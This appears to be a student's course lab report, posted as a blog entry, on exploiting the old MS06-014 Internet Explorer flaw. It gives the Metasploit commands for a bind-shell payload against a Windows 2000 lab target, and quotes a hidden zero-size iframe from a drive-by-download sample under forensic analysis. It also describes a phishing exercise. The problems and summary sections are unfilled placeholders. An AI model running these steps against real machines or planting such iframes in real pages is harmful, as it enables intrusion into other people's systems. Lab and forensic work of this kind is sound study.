20252921 2025-2026-2 《网络攻防实践》实践十一报告

20252921 2024-2025-2 《网络攻防实践》实践11报告

1.实践内容

第一部分依托 Metasploit 平台完成 MS06-014 浏览器漏洞复现:基于 Kali 攻击机完成漏洞利用模块配置与远程 Shell 载荷部署,由 Windows 2000 靶机主动访问恶意网页资源,攻击机与靶机成功打通会话连接,完整核验浏览器类漏洞从配置、触发到获取控制会话的标准化利用流程。
第二部分开展网页挂马恶意样本溯源取证工作:以入口文件 start.html 为分析起点,逐层溯源关联 new09.htm 页面、内嵌隐藏 iframe 标签及外链 JS 脚本文件,通过提取恶意链接 URL 并核算 MD5 哈希值,匹配哈希库文件定位同源恶意样本。后续逐层解码脱壳,先后完成 Base64 编码、XXTEA 加密、十六进制字符转译、JS 代码混淆代码还原,最终解析核心恶意逻辑:该恶意脚本会侦测主机内 ADODB.Stream 组件、暴风影音播放器、PPS 影音、百度工具栏等老旧系统 ActiveX 控件,依据终端环境适配结果,差异化调用二级恶意脚本,或是下发下载远控恶意载荷。
第三部分落地浏览器渗透攻防对抗实操演练:攻击侧先后核验 MS06-055、MS06-014 两款高危浏览器漏洞可用性,将真实恶意攻击链接经 Base64 编码伪装后,整合制作统一钓鱼落地页,依托钓鱼邮件社工手段诱导靶机用户点击访问;防御侧通过网页源码审计、HTTP 全网流量抓包分析,追踪隐藏 iframe 调用行为、恶意载荷请求报文、攻击反向通信链路,完整复盘全流程攻击链路,完成攻防双向对抗研判。

2.实践过程

2.1web浏览器渗透攻击

首先测试kali与win2k的连通性
image

打开metasploitable
image

使用命令search MS06-014来查找对应的漏洞信息
image

输入use exploit/windows/browser/ie_createobject加载针对 IE 浏览器 CreateObject 漏洞的攻击利用模块
image

后我们选择远程shell类型payload,并启动exploit。使用命令set payload windows/shell/bind_tcp来选择payload,之后使用exploit命令来开始攻击
image

这里可以看到生成了一个url,去win2k中输入得到
image

输入sessions列出当前所有已经成功建立的靶机控制会话
image
输入sessions -i 1进入编号为 1 的靶机交互式控制终端
image
输入ipconfig 查看靶机 IP,发现成功攻击
image

2.2 取证分析实践—网页木马攻击场景分析

使用记事本打开start.html,找到new09.htm的位置
image
属于典型网页挂马恶意特征
查看new09.htm

<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe> 
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script>

3.学习中遇到的问题及解决

  • 问题1:XXXXXX
  • 问题1解决方案:XXXXXX
  • 问题2:XXXXXX
  • 问题2解决方案:XXXXXX - ...

4.实践总结

xxx xxx

posted @ 2026-06-17 15:31  DKYTT  阅读(4)  评论(0)    收藏  举报